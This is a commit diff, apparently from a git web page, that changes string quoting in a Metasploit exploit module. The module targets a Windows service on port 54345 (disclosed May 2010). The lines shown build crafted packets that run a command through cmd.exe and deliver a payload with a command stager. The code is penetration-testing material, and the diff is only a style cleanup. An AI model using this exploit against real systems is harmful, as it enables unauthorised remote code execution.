slight updates to magentproc docs
parent
b698095c49
commit
4dacc70b9a
|
@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'Privileged' => false,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DisclosureDate' => "May 06 2010",
|
||||
'DisclosureDate' => 'May 06 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([Opt::RPORT(54345)])
|
||||
|
@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
cmd1 = "C:\\Windows\\system32\\cmd.exe"
|
||||
cmd2 = "/C \"#{cmd}\""
|
||||
|
||||
pkt1 = [0x19].pack('N') + guid + "0"
|
||||
pkt1 = [0x19].pack('N') + guid + '0'
|
||||
|
||||
pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
|
||||
pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
|
||||
|
@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
print_status("Sending payload...")
|
||||
print_status('Sending payload...')
|
||||
execute_cmdstager(linemax: 1500)
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue